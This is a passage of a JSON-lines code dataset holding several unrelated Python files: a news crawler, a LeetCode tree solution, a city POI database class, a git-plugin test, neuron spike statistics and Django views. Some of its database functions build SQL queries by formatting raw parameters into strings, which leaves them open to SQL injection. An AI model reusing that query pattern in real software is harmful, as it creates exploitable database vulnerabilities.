BloomFilter(capacity=1500000, error_rate=0.001)\ndef initUrlsBloomFilter(cursor,source_type):\n '''构造已经抓取新闻urls的布隆过滤器\n @param cursor: db链接\n @param source_type: 抓取来源:比如yahoo、google等\n '''\n sql = \"select url from news_extract_content where crawl_source = \" + str(source_type) + \" limit %s,%s\"\n w_flag = True\n index = 0\n page_num = 50000\n while w_flag:\n w_flag = False\n count = cursor.execute(sql,(index,page_num))\n if count > 0:\n w_flag = True\n data = cursor.fetchall()\n for da in data :\n url = da[0]\n bf.add(url)\n index += page_num\n \n \n\nclass ExtracteNewsurls(object):\n \"\"\"\n 每个来源的频道中得新闻链接进行抽取,主要是可视化的抽取,因此每个来源可能不同\n \"\"\"\n def extracte(self,news_chanel_url,is_finance_home,baseCrawl,baseExtract,req_referer,try_times = 1):\n '''抽取频道首页或者每个公司新闻频道中得所有urls,\n 每个页面最多抓取 MAX_TRY_TIMES+1 次\n @param news_chanel_url: 抓取的链接,\n @param is_finance_home:是否是finance_home,可能需要单独处理\n @param baseCrawl: 封装的抓取基类\n @param baseExtract: 封装的抽取基类\n @param try_times: 重试次数\n @return: 抓取状态,抽取的新闻链接\n '''\n \n logger.info(\"crawl %s, %d time\"%(news_chanel_url,try_times))\n time.sleep(IDEL_TIME * (try_times-1))\n status = 2\n html = ''\n try:\n status,html = baseCrawl.crawl_page(news_chanel_url, req_referer = req_referer)\n #返回频道下面所有新闻链接\n news_links = []\n if status == 200:\n status = 0\n logger.info(\"crawl %s, success \"%news_chanel_url)\n news_links = self.extracteUrls(baseExtract,html, is_finance_home)\n \n elif status in [301,302]:\n status = 1\n logger.info(\"crawl %s, no data,fail\"%news_chanel_url)\n else:\n if try_times <= MAX_TRY_TIMES:\n return self.extracte(news_chanel_url,is_finance_home, baseCrawl, baseExtract, req_referer, try_times+1)\n else:\n status = 2\n logger.error(\"crawl %s, %d time,fail\"%(news_chanel_url,try_times))\n except:\n logger.error(\"crawl %s, failed ,Error:%s\" % (news_chanel_url,traceback.format_exc()))\n \n \n return status,news_links\n \n \n \n \n \n def extracteUrls(self,baseExtract,html,is_finance_home):\n \"\"\"提取新闻链接\n @param baseExtract: 封装的抽取基类\n @param html:网页内容 \n @param is_finance_home: 是否是finance_home,可能需要单独处理\n \"\"\"\n #必须子类实现\n raise NotImplementedError\n\n\n\ndef extract_news(code,news_links,crawl_source,cursor):\n '''抽取新闻,并进行NLP\n @param code: 上市公司编码\n @param news_links: 需要抽取的新闻链接\n @param crawl_source\n @param cursor: 数据库游标\n '''\n \n in_sql = \"\"\" INSERT INTO news_extract_content(url_md5,url,code_name,newspaper_title,newspaper_text,\nnewspaper_authors,newspaper_summary,newspaper_keywords,boilerpipe_article,\nboilerpipe_articlesentences,boilerpipe_keepeverything,boilerpipe_largestcontent,\nboilerpipe_numwordsrules,boilerpipe_canola,up_time,add_time,extract_count,crawl_source)\nVALUES\n(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,now(),now(),1,%s)\non duplicate key update code_name = %s,newspaper_title = %s,newspaper_text = %s,\nnewspaper_authors = %s,newspaper_summary = %s,newspaper_keywords = %s,\nboilerpipe_article = %s,boilerpipe_articlesentences = %s,boilerpipe_keepeverything = %s,\nboilerpipe_largestcontent = %s,boilerpipe_numwordsrules = %s,boilerpipe_canola = %s,\nup_time = now(),extract_count=extract_count+1,crawl_source = %s \"\"\"\n \n for link in news_links:\n #长度小于30的url一般都不是新闻连接,暴力,简单可依赖\n if link is None or len(link) <= 30:\n continue\n #已经抓取的url就不需要抓取了\n if link in bf:\n continue\n \n try:\n global NEWS_URL_EXTRACTE\n NEWS_URL_EXTRACTE += 1\n url_md5 = hashlib.md5(link).hexdigest()\n #首先让使用newspaper\n newspaper_title = ''\n newspaper_text = ''\n newspaper_authors = ''\n newspaper_summary = ''\n newspaper_keywords = ''\n article = Article(link)\n article.download()\n html = article.html\n if html is None or len(html) == 0:\n continue\n article.parse()\n if article.text and len(article.text) > 0:\n newspaper_title = article.title\n newspaper_text = article.text\n newspaper_authors = article.authors\n if newspaper_authors and len(newspaper_authors) > 0:\n newspaper_authors = ','.join(newspaper_authors)\n else:\n newspaper_authors = ''\n \n \n article.nlp()\n newspaper_summary = article.summary\n newspaper_keywords = article.keywords\n if newspaper_keywords and len(newspaper_keywords) > 0:\n newspaper_keywords = ','.join(newspaper_keywords)\n else:\n newspaper_keywords = ''\n \n #然后使用boilerpipe\n \n extractor = Extractor(extractor='ArticleExtractor',html = html)\n boilerpipe_article = extractor.getText()\n \n extractor = Extractor(extractor='ArticleSentencesExtractor',html = html)\n boilerpipe_articlesentences = extractor.getText()\n \n extractor = Extractor(extractor='KeepEverythingExtractor',html = html)\n boilerpipe_keepeverything = extractor.getText()\n \n extractor = Extractor(extractor='LargestContentExtractor',html = html)\n boilerpipe_largestcontent = extractor.getText()\n \n extractor = Extractor(extractor='NumWordsRulesExtractor',html = html)\n boilerpipe_numwordsrules = extractor.getText()\n \n extractor = Extractor(extractor='CanolaExtractor',html = html)\n boilerpipe_canola = extractor.getText()\n \n #输入的参数\n content = (url_md5,link,code, newspaper_title, newspaper_text, newspaper_authors,newspaper_summary,newspaper_keywords,\\\n boilerpipe_article,boilerpipe_articlesentences,boilerpipe_keepeverything,boilerpipe_largestcontent,\\\n boilerpipe_numwordsrules,boilerpipe_canola,crawl_source, \\\n code, newspaper_title,newspaper_text, newspaper_authors,\\\n newspaper_summary,newspaper_keywords,boilerpipe_article,boilerpipe_articlesentences,boilerpipe_keepeverything,\\\n boilerpipe_largestcontent,boilerpipe_numwordsrules,boilerpipe_canola,crawl_source)\n cursor.execute(in_sql,content)\n \n except:\n logger.error(\"crawl_page failed ,Error:%s\" % traceback.format_exc())\n \n \n\ndef go_newsextrac(source_type,code_names_file,url_prefix,req_referer,finance_homes,extracteNewsurls):\n '''抓取所有的新闻链接、抽取并存储\n @param source_type: 抓取来源:比如yahoo、google等\n @param code_names_file: 公司上市代码列表\n @param url_prefix: 拼接上市公司新闻url的前缀\n @param req_referer: 抓取前连,防封禁\n @param finance_homes: 财经频道首页地址\n @param extracteNewsurls: 个性化的抽取对象\n '''\n baseCrawl = BaseCrawl() \n baseExtract = BaseExtract()\n \n cxn_db = None\n try:\n cxn_db = get_cxn_db()\n cur_db = cxn_db.cursor()\n #构造一个boolm filter\n initUrlsBloomFilter(cur_db,source_type)\n \n in_sql = \"\"\" insert into com_news_extract_state (url,code_name,crawl_time,return_type,add_time,crawl_count,source_type)\nvalues (%s,%s,now(),%s,now(),1,%s)\non duplicate key update crawl_time = now(),return_type = %s,crawl_count=crawl_count+1,source_type = %s \"\"\"\n \n news_chanel_urls = get_compnewsurls(code_names_file,url_prefix,finance_homes)\n \n logger.info(\"number of companys is %d\"%len(news_chanel_urls))\n for code,news_chanel_url in news_chanel_urls:\n logger.debug(\"crawl %s, start............ \"%news_chanel_url)\n is_finance_home = False\n if code == FINANCE_HOME:\n is_finance_home = True\n status,news_links = extracteNewsurls.extracte(news_chanel_url,is_finance_home,baseCrawl,baseExtract,req_referer,try_times = 1)\n cur_db.execute(in_sql,(news_chanel_url,code,status,source_type,status,source_type))\n if status == 0 and len(news_links) > 0:\n extract_news(code,news_links,source_type,cur_db)\n logger.debug(\"crawl %s, end.............. \"%code)\n \n logger.info(\"number of news url is %s\"%NEWS_URL_EXTRACTE)\n \n except:\n logger.error(\"crawl_page failed ,Error:%s\" % traceback.format_exc()) \n finally:\n if cxn_db:\n cxn_db.close()\n \nif __name__ == '__main__':\n cxn_db = None\n try:\n cxn_db = get_cxn_db()\n cur_db = cxn_db.cursor()\n #构造一个boolm filter\n initUrlsBloomFilter(cur_db,1)\n \n# print bf.exists('https://mail.yahoo.com/?.intl=us&.lang=en-US&.src=ym')\n# print bf.exists('http://www.latimes.com/la-fi-hy-helmet-safety-20150409-story.html')\n# print bf.exists('http://www.baidu.com')\n \n except:\n logger.error(\"crawl_page failed ,Error:%s\" % traceback.format_exc()) \n finally:\n if cxn_db:\n cxn_db.close()\n\n","sub_path":"crawl/newsextracte.py","file_name":"newsextracte.py","file_ext":"py","file_size_in_byte":11925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"440513182","text":"#\r\n# @lc app=leetcode.cn id=236 lang=python\r\n#\r\n# [236] 二叉树的最近公共祖先\r\n#\r\n\r\n# @lc code=start\r\n# Definition for a binary tree node.\r\n# class TreeNode(object):\r\n# def __init__(self, x):\r\n# self.val = x\r\n# self.left = None\r\n# self.right = None\r\n\r\nclass Solution(object):\r\n\r\n def lowestCommonAncestor(self,root,p,q):\r\n \"\"\"\r\n :type root: TreeNode\r\n :type p: TreeNode\r\n :type q: TreeNode\r\n :rtype: TreeNode\r\n \"\"\"\r\n if not root or root == p or root == q:\r\n return root\r\n else:\r\n left = self.lowestCommonAncestor(root.left, p, q)\r\n right = self.lowestCommonAncestor(root.right, p, q)\r\n \r\n if left and right: #一个在左子树,一个在右子树\r\n return root\r\n elif left:#都在左子树\r\n return left\r\n elif right:#都在右子树\r\n return right\r\n else:\r\n return\r\n\r\n# @lc code=end\r\n\r\n","sub_path":"Week_03/236.二叉树的最近公共祖先.py","file_name":"236.二叉树的最近公共祖先.py","file_ext":"py","file_size_in_byte":1033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"395267275","text":"# from connection import *\nfrom datetime import datetime\nfrom connection import *\n\nclass CityOfficial():\n\n\tdef applyFilter(self, name, city, state, zipCode, flag, dateFlag):\n\t\tconnection = connect()\n\t\tcursor = connection.cursor()\n\n\t\tisFirstCondition = True\n\n\t\tif name == None and city == None and state == None and zipCode == None and flag == None and dateFlag == [None, None]:\n\t\t\tsql = \"SELECT * FROM POI\"\n\t\telse:\n\t\t\tsql = \"SELECT * FROM POI WHERE\"\n\n\t\tif name == None:\n\t\t\tsql = sql\n\t\telse:\n\t\t\tsql = sql + \" LocationName = \\'{0}\\'\".format(name)\n\t\t\tisFirstCondition = False\n\n\t\tif city == None:\n\t\t\tsql = sql\n\t\telse:\n\t\t\tif isFirstCondition:\n\t\t\t\tsql = sql + \" City = \\'{0}\\'\".format(city)\n\t\t\t\tisFirstCondition = False\n\t\t\telse:\n\t\t\t\tsql = sql + \" AND City = \\'{0}\\'\".format(city)\n\n\t\tif state == None:\n\t\t\tsql = sql\n\t\telse:\n\t\t\tif isFirstCondition:\n\t\t\t\tsql = sql + \" State = \\'{0}\\'\".format(state)\n\t\t\t\tisFirstCondition = False\n\t\t\telse:\n\t\t\t\tsql = sql + \" AND State = \\'{0}\\'\".format(state)\n\n\t\tif zipCode == None:\n\t\t\tsql = sql\n\t\telse:\n\t\t\tif isFirstCondition:\n\t\t\t\tsql = sql + \" ZipCode = \\'{0}\\'\".format(zipCode)\n\t\t\t\tisFirstCondition = False\n\t\t\telse:\n\t\t\t\tsql = sql + \" AND ZipCode = \\'{0}\\'\".format(zipCode)\n\n\t\tif flag == None:\n\t\t\tsql = sql\n\t\telse:\n\t\t\tif isFirstCondition:\n\t\t\t\tsql = sql + \" Flag = {0}\".format(flag)\n\t\t\t\tisFirstCondition = False\n\t\t\telse:\n\t\t\t\tsql = sql + \" AND Flag = {0}\".format(flag)\n\n\n\t\tFormalized_Date = [\"DateFlagged\", \"DateFlagged\"]\n\n\t\tif dateFlag == [None, None]: # or maybe [None, None] ?\n\t\t\tsql = sql\n\t\telse:\n\t\t\t# Assume time format: Date: yyyy/mm/dd ; Time: hh:mm AS STRING\n\t\t\tfor i in range(len(dateFlag)):\n\t\t\t\tif dateFlag[i] is not None:\n\t\t\t\t\tDate = dateFlag[i].split('/')\n\t\t\t\t\tDate = map(int, Date)\n\t\t\t\t\t# Convert the format into yyyy-mm-dd hh:mm\n\t\t\t\t\tFormalized_Date[i] = (datetime(*Date).strftime('%Y-%m-%d'))\n\t\t\t\t\tFormalized_Date[i] = \"\\'%s\\'\" % Formalized_Date[i]\n\n\t\t\tif isFirstCondition:\n\t\t\t\t# if not (None in dateFlag):\n\t\t\t\tsql = sql + \" DateFlagged >= {0} AND DateFlagged <= {1}\".format(Formalized_Date[0], Formalized_Date[1])\n\t\t\t\tisFirstCondition = False\n\t\t\telse:\n\t\t\t\tsql = sql + \" AND DateFlagged >= {0} AND DateFlagged <= {1}\".format(Formalized_Date[0], Formalized_Date[1])\n\n\t\t# if isFirstCondition:\n\t\t# \tsql = sql + \" LocationName in (SELECT DISTINCT LocName FROM Data_Point WHERE Status = 'Accepted')\"\n\t\t# \tisFirstCondition = False\n\t\t# else:\n\t\t# \tsql = sql + \" AND LocationName in (SELECT DISTINCT LocName FROM Data_Point WHERE Status = 'Accepted')\"\n\t\t#print (sql)\n\n\t\t# sql = \"SELECT * FROM POI WHERE LocationName = %s AND City = %s AND State = %s AND ZipCode = %s AND Flag = %s AND DateFlagged BETWEEN %s AND %s\"\n\t\t# sql = \"SELECT * FROM POI WHERE LocationName = \\'Lenox Square\\'\"\n\n\t\tcursor.execute(sql)\n\t\t# # cursor.execute(sql, (name, city, state, zipCode, flag, Formalized_Date[0], Formalized_Date[1]))\n\t\tresults = cursor.fetchall()\n\t\t# return results\n\t\tconnection.close()\n\n\t\tfor result in results:\n\t\t\tresult['DateFlagged'] = str(result['DateFlagged'])\n\t\t# print results\n\t\t# print results[0].keys()\n\n\t\t# Change the name of keys to make it compatible with jsonify() in serv.py\n\t\tif results is not None:\n\t\t\tfor dic in results:\n\t\t\t\tdic['id'] = results.index(dic)\n\t\t\t\tdic['name'] = dic.pop(u'LocationName')\n\t\t\t\tdic['zip'] = dic.pop(u'ZipCode')\n\t\t\t\tdic['city'] = dic.pop(u'City')\n\t\t\t\tdic['state'] = dic.pop(u'State')\n\t\t\t\tdic['flag'] = dic.pop(u'DateFlagged')\n\t\t\t\tdic['flagged'] = dic.pop(u'Flag')\n\n\t\t# print results\n\t\treturn results\n\n\n\tdef showPOIDetail(self, locname, dataType, dataValue, date, time):\n\t\t# Must input input two datetime value\n\t\tconnection = connect()\n\t\tcursor = connection.cursor()\n\n\t\tsql = \"SELECT DataType, DataValue, DateTime FROM Data_Point WHERE LocName = \\'{0}\\'\".format(locname)\n\n\t\tif dataType == None:\n\t\t\tsql = sql\n\t\telse:\n\t\t\tsql = sql + \" AND DataType = \\'{0}\\'\".format(dataType)\n\n\t\tif dataValue == [None, None]:\n\t\t\tsql = sql\n\t\telse:\n\t\t\tif dataValue[0] == None:\n\t\t\t\tdataValue[0] = 0\n\t\t\tif dataValue[1] == None:\n\t\t\t\tdataValue[1] = 99999999\n\t\t\t# Default_DataValue = ['DataValue', 'DataValue']\n\t\t\t# for i in range(len(dataValue)):\n\t\t\t\t# if dataValue[i] is not None:\n\t\t\t\t# \tDefault_DataValue[i] = \"\\'%s\\'\" % dataValue[i]\n\t\t\t\t# \tprint Default_DataValue[i]\n\n\t\t\tsql = sql + \" AND DataValue >= {0} AND DataValue <= {1}\".format(dataValue[0], dataValue[1])\n\n\t\tif date == None:\n\t\t\tsql = sql\n\t\telse:\n\t\t\tFormalized_DateTime = [\"DateTime\", \"DateTime\"]\n\t\t\tfor i in range(len(date)):\n\t\t\t\tif date[i] is not None:\n\t\t\t\t\tDateTime = date[i].split('/') + time[i].split(':')\n\t\t\t\t\tDateTime = map(int, DateTime)\n\t\t\t\t\t# Convert the format into yyyy-mm-dd hh:mm\n\t\t\t\t\tFormalized_DateTime[i] = (datetime(*DateTime).strftime('%Y-%m-%d %H:%M'))\n\t\t\t\t\tFormalized_DateTime[i] = \"\\'%s\\'\" % Formalized_DateTime[i]\n\n\t\t\tsql = sql + \" AND DateTime >= {0} AND DateTime <= {1}\".format(Formalized_DateTime[0], Formalized_DateTime[1])\n\n\t\tsql = sql + \" AND Status = 'Accepted' ORDER BY DateTime\"\n\n\t\t# print sql\n\t\tcursor.execute(sql)\n\t\tresults = cursor.fetchall()\n\t\t# print results\n\t\tconnection.close()\n\n\t\tif results is not None:\n\t\t\tfor dic in results:\n\t\t\t\t# dic['id'] = results.index(dic)\n\t\t\t\tdic['attr'] = dic.pop(u'DataType')\n\t\t\t\tdic['val'] = dic.pop(u'DataValue')\n\t\t\t\tdic['ts'] = dic.pop(u'DateTime')\n\t\t\t\tdic['loc'] = locname\n\n\t\t# print results\n\t\treturn results\n\n\n\tdef flagPOI(self, locname, status):\n\t\tconnection = connect()\n\t\tcursor = connection.cursor()\n\n\t\t# get current time\n\t\tdateFlagged = \"{0}\".format(datetime.now())\n\t\tdateFlagged = dateFlagged.split(' ')\n\n\t\tdateFlagged = dateFlagged[0] if status else 'NULL'\n\n\t\tif status:\n\t\t\tsql = \"UPDATE POI SET Flag = \\'{0}\\', DateFlagged = \\'{1}\\' WHERE LocationName = \\'{2}\\'\".format(status, dateFlagged, locname)\n\t\telse:\n\t\t\tsql = \"UPDATE POI SET Flag = \\'{0}\\', DateFlagged = NULL WHERE LocationName = \\'{1}\\'\".format(status, locname)\n\t\t# sql = \"UPDATE POI SET DateFlagged = \\'{0}\\' WHERE LocationName = \\'{1}\\'\".format(dateFlagged, locname)\n\n\t\tcursor.execute(sql)\n\n\t\tconnection.commit()\n\t\tconnection.close()\n\n\t\tif dateFlagged != 'NULL':\n\t\t\treturn dateFlagged\n\t\telse:\n\t\t\treturn None\n","sub_path":"City_Official.py","file_name":"City_Official.py","file_ext":"py","file_size_in_byte":6043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"101371206","text":"import importlib.machinery\nfrom os.path import abspath, join, dirname\n\nimport peru\nimport shared\n\ngit_plugin_path = abspath(\n join(\n dirname(peru.__file__), 'resources', 'plugins', 'git',\n 'git_plugin.py'))\nloader = importlib.machinery.SourceFileLoader(\"git_plugin\", git_plugin_path)\ngit_plugin = loader.load_module()\n\n\n# NOTE: The sync/reup functionality for the git plugin is tested in\n# test_plugins.py along with the other plugin types.\nclass GitPluginTest(shared.PeruTest):\n def test_expand_relative_submodule_url(self):\n cases = [\n (\"http://foo.com/a/b\", \"c\", \"c\"),\n (\"http://foo.com/a/b\", \"./c\", \"http://foo.com/a/b/./c\"),\n (\"http://foo.com/a/b\", \"../c\", \"http://foo.com/a/b/../c\"),\n (\"http://foo.com/a/b\", \"../../c\", \"http://foo.com/a/b/../../c\"),\n (\"http://foo.com/a/b\", \".//../c\", \"http://foo.com/a/b/.//../c\"),\n ]\n for (parent, submodule, expected) in cases:\n result = git_plugin.expand_relative_submodule_url(\n submodule, parent)\n assert expected == result, \"{} != {}\".format(expected, result)\n","sub_path":"tests/test_git_plugin.py","file_name":"test_git_plugin.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"354685522","text":"import pickle\r\nimport sys\r\nsys.path.append('../')\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom thetaOscillationsUnitsRecorded import KwargsVariablesDict\r\n\r\n#debug('Dict: ',KwargsVariablesDict)\r\n\r\n#Default dictionary\r\nDefaultDict = KwargsVariablesDict\r\n\r\n#\r\n#Define class\r\n#\r\n\r\nclass statsClass(object):\r\n\r\n\tdef __init__(self,**_NewKwargsVariablesDict):\r\n\r\n\t\t#init with parameters of simulation\r\n\t\tself.__dict__.update(DefaultDict)\r\n\r\n\t\t#init parameters\r\n\t\tself.__dict__.update(**_NewKwargsVariablesDict)\r\n\r\n\t\t# set Time \r\n\t\tself.bins_int = int(self.finalTimeFloat/self.stepTimeFloat) #no. of time steps\r\n\t\tself.t_span = np.linspace(0, self.finalTimeFloat, self.bins_int, endpoint=True)\r\n\r\n\t\t#load spiking data\r\n\t\tself.spikeTimesArraysArray = pickle.load(open(self.dataFile))\r\n\r\n\tdef neuronsRaster(self):\r\n\r\n\t\timport utils\r\n\r\n\t\tif hasattr(self, 'chosenNeuron')==False:\r\n\t\t\tself.chosenNeuron = self.recordNeuronIndexIntsList\r\n\r\n\t\tif len(self.chosenNeuron)>1:\r\n\t\t\tself.neuronColorStrsList=utils.getColorTuplesList(\r\n\t\t\t\t\"Red\",\r\n\t\t\t\t\"Blue\",\r\n\t\t\t\tlen(self.chosenNeuron)\r\n\t\t\t\t)\r\n\r\n\t\tfor _index, _neuronID in enumerate(self.chosenNeuron):\r\n\t\t\tself.neuronSpikeTimesArrays = self.spikeTimesArraysArray['Neuron '+str(_neuronID)]\r\n\r\n\t\t\t#plot raster for chosen neuron\r\n\t\t\tfor trialIndex in xrange(self.simulationsInt):\r\n\t\t\t\tSpikeTrain = self.neuronSpikeTimesArrays[trialIndex]\r\n\t\t\t\tplt.plot(\r\n\t np.array(SpikeTrain)*self.stepTimeFloat,\r\n\t [trialIndex+1]*len(SpikeTrain),\r\n\t '.',\r\n\t\t\t\t\tcolor=self.neuronColorStrsList[_index] if len(self.chosenNeuron)>1 else 'Blue'\r\n\t\t\t\t\t)\r\n\r\n\t\tplt.xlabel('Time/ ms', fontsize='large', fontweight='medium')\r\n\t\tplt.ylabel('Trial Number', fontsize='large', fontweight='medium')\r\n\r\n\t\tplt.show()\r\n\t\treturn self\r\n\r\n\r\n\tdef neuronFiringRate(self):\r\n\r\n\t\t#\r\n\t\t# choose neuron\r\n\t\t#\r\n\t\tif hasattr(self, 'chosenNeuron')==False:\r\n\t\t\tself.chosenNeuron = self.recordNeuronIndexIntsList\r\n\r\n\t\tfor neuronID in self.chosenNeuron:\r\n\t\t\tself.neuronSpikeTimesArrays = self.spikeTimesArraysArray['Neuron '+str(neuronID)]\r\n\r\n\t\t\t#plot raster for chosen neuron\r\n\t\t\tif len(self.chosenNeuron)==1:\r\n\t\t\t\tfor trialIndex in xrange(self.simulationsInt):\r\n\t\t\t\t\tSpikeTrain = self.neuronSpikeTimesArrays[trialIndex]\r\n\t\t\t\t\tplt.plot(\r\n\t\t np.array(SpikeTrain)*self.stepTimeFloat,\r\n\t\t [trialIndex+1]*len(SpikeTrain),\r\n\t\t 'b|'\r\n\t\t )\r\n\t\t \r\n\t\t\t#\r\n\t\t\t#generating a spike matrix across trials\r\n\t\t\t#\r\n\r\n\t\t\t#init\r\n\t\t\tself.spikeIntsArray = np.zeros((self.simulationsInt, self.bins_int))\r\n\r\n\t\t\tfor trialIndex in xrange(self.simulationsInt):\r\n\t\t\t\tif len(self.neuronSpikeTimesArrays[trialIndex]) == 0:\r\n\t\t\t\t\tcontinue\r\n\t\t\t\tself.spikeIntsArray[trialIndex, self.neuronSpikeTimesArrays[trialIndex]] = 1\r\n\r\n\t\t\tif hasattr(self, 'trialIndexIntsList')==False:\r\n\t\t\t\tself.trialIndexIntsList=xrange(0, self.simulationsInt)\r\n\t\t\tself.trialsInt=len(self.trialIndexIntsList) #number of trials\r\n\r\n\t\t\t#spike count and rate\r\n\t\t\tself.scNeuron = np.sum(self.spikeIntsArray[self.trialIndexIntsList,:], axis=0)\r\n\t\t\tself.rNeuron = self.scNeuron/self.trialsInt\r\n\r\n\t\t\tfor self.rateWindow in self.rateWindowFloatsList:\r\n\t\t\t\tself.rateBin=self.rateWindow/self.stepTimeFloat\r\n\t\t\t\tself.tBin=xrange(0, self.bins_int, int(self.rateBin))\r\n\r\n\t\t\t\t#compute rate over time windows\r\n\t\t\t\trateNeuron = map(\r\n\t\t\t\t\tlambda __Int:\r\n\t\t\t\t\tsum(self.rNeuron[__Int:__Int+self.rateBin])/(0.001*self.rateWindow),\r\n\t\t\t\t\tself.tBin\r\n\t\t\t\t\t)\r\n\r\n\t\t\t\tplt.plot((self.rateWindow/2.)+np.array(self.tBin)*self.stepTimeFloat, rateNeuron, \r\n\t\t\t\t\tlabel=r'r_${Neuron_'+str(self.chosenNeuron)+'}$', lw=2, alpha=1)\r\n\t\t\t\r\n\t\t\tplt.xlabel('Time/ ms', fontsize='large', fontweight='medium')\r\n\t\t\tplt.ylabel(r'Neuron Firing Rate (sp s$^{-1}$ )', fontsize='large', fontweight='medium')\r\n\r\n\t\t\tplt.hold(True)\r\n\t\tplt.show()\r\n\r\n\t\treturn self\r\n\r\n\r\n\tdef fanoFactor(self):\r\n\r\n\t\t#spike counts per time window\r\n\r\n\t\tself.spikeCountWindowFloatsList = map(\r\n\t\t\tlambda __Int:\r\n\t\t\tnp.sum(self.spikeIntsArray[self.trialIndexIntsList, __Int:__Int+self.rateBin],axis=1),\r\n\t\t\tself.tBin\r\n\t\t\t)\r\n\r\n\t\tself.spikeCountWindowFloatsArray = np.array(self.spikeCountWindowFloatsList).T\r\n\r\n\t\t#variance over trials\r\n\r\n\t\tself.spikeCountVarianceFloatsArray = np.var(self.spikeCountWindowFloatsArray,axis=0)\r\n\r\n\t\t#mean spike count over trials\r\n\r\n\t\tself.meanSpikeCountFloatsList = map(\r\n\t\t\t\t\tlambda __Int:\r\n\t\t\t\t\tsum(self.rNeuron[__Int:__Int+self.rateBin]),\r\n\t\t\t\t\tself.tBin\r\n\t\t\t\t\t)\r\n\r\n\t\told_settings = np.seterr(all='ignore')\r\n\r\n\t\tself.fanoFactorFloatsArray=np.divide(self.spikeCountVarianceFloatsArray,\r\n\t\tnp.array(self.meanSpikeCountFloatsList)\r\n\t\t)\r\n\r\n\t\tplt.plot((self.rateWindow/2.)+np.array(self.tBin)*self.stepTimeFloat, self.fanoFactorFloatsArray, \r\n\t\t\t\t\tmarker='o', linestyle='--', label=r'FF_${Neuron_'+str(self.chosenNeuron)+'}$')\r\n\r\n\t\tplt.xlabel('Time/ ms', fontsize='large', fontweight='medium')\r\n\t\tplt.ylabel('Fano Factor', fontsize='large', fontweight='medium')\r\n\r\n\t\tplt.show()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\t\t\r\n\r\n\r\n\r\n","sub_path":"OscillationsPrediNetwork/SpikeTests/statsUtils.py","file_name":"statsUtils.py","file_ext":"py","file_size_in_byte":5017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"607340307","text":"\nimport simplejson as json\nfrom django.views.generic.detail import DetailView\nfrom django.views.generic.list import ListView\nfrom django import forms\n\nfrom basketball.models import Player, Season\n\n\nclass PlayerList(ListView):\n model = Player\n template_name = 'player_list.html'\n\n\nclass PlayerDetailFilters(forms.Form):\n season = forms.ModelChoiceField(\n queryset=Season.objects.all(),\n widget=forms.Select(attrs={'class': 'form-control input-sm'}))\n\n\nclass PlayerDetail(DetailView):\n model = Player\n template_name = 'player_detail.html'\n\n def get_points_graph_data(self, game_logs):\n point_values = []\n for i, gl in enumerate(game_logs):\n point_values.append({\n 'x': i + 1,\n 'y': gl.draft_king_points,\n 'game': str(gl.game)\n })\n return point_values\n\n def get_playtime_graph_data(self, game_logs):\n point_values = []\n for i, gl in enumerate(game_logs):\n point_values.append({\n 'x': i + 1,\n 'y': gl.minutes,\n 'game': str(gl.game)\n })\n return point_values\n\n def get_graph_data(self, game_logs):\n data = [\n {\n 'values': self.get_points_graph_data(game_logs),\n 'key': 'points',\n 'color': '#ff7f0e',\n },\n {\n 'values': self.get_playtime_graph_data(game_logs),\n 'key': 'playtime',\n 'color': '#cc7ffe',\n },\n ]\n return data\n\n def get_game_logs(self, player):\n return player.gamelog_set.all().order_by('game__date')\n\n def get_context_data(self, **kwargs):\n context = super(PlayerDetail, self).get_context_data(**kwargs)\n player = context['object']\n game_logs = self.get_game_logs(player)\n\n page_filters = PlayerDetailFilters(self.request.GET)\n if page_filters.is_valid():\n\n season = page_filters.cleaned_data.get('season')\n if season:\n game_logs = game_logs.filter(game__season=season)\n\n context['filters'] = page_filters\n context['data'] = json.dumps(self.get_graph_data(game_logs))\n context['average_points'] = player.average_points(game_logs=game_logs)\n context['average_playtime'] = round(player.average_minutes(game_logs=game_logs), 2)\n context['average_pts_per_min'] = round(context['average_points'] / context['average_playtime'], 2)\n context['game_logs'] = game_logs\n return context\n","sub_path":"draftkings/basketball/views/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":2583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"252404779","text":"from Pakiet import text\nfrom math import sqrt\n\n\ndef selected_language(choice, choice_txt):\n if choice_txt == \"pl\":\n txt = \"Pierwiastek wynosi: \"\n else:\n txt = \"The root is equal: \"\n text.center(choice.lang['hello'], 50)\n sqr = int(input(choice.lang['info']))\n if sqr < 0:\n text.center(choice.lang['error'], 50)\n else:\n text.center(f\"{txt}{sqrt(sqr)}\", 50)\n text.center(choice.lang['bye'], 50)\n\n\nchoose_lang = input(\"Choose lang [pl/en]\")\n\nif choose_lang == \"pl\":\n from Słownik import pl\n selected_language(pl, choose_lang)\nelse:\n from Słownik import en\n selected_language(en, choose_lang)\n","sub_path":"python/lab5/Słownik/slownik.py","file_name":"slownik.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"584506392","text":"from utils.import_packages import *\nimport utils.hardcode_parameters as param\nfrom data_gathering.DataChecker import DataChecker\nimport pytz\n\ndef convert2RealTime(dateVals, pteVals):\n timeDate = []\n\n for (date,pte) in zip( dateVals,pteVals):\n timeDate.append( date+timedelta(minutes=15*(pte-1)))\n return timeDate\n\ndef convert_PTE_2_rt(df_date, df_pte, periodByHour = 4):\n timeDate = []\n for (date, pte) in zip(df_date, df_pte):\n timeDate.append(date + timedelta(minutes=60 / periodByHour * (pte - 1)))\n return timeDate\n\n\nclass TimeSeriesData():\n def __init__(self, df, date_column, val_column, created_time_column=None, periodByHour = 4, pteCol = None, convertTime = True):\n df[date_column] = pd.to_datetime(df[date_column])\n selected_feat = []\n self.valCol = [x for x in 